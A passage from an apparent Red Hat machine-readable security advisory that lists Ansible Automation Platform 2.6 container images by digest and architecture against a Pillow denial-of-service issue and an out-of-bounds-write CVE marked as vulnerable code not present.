"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
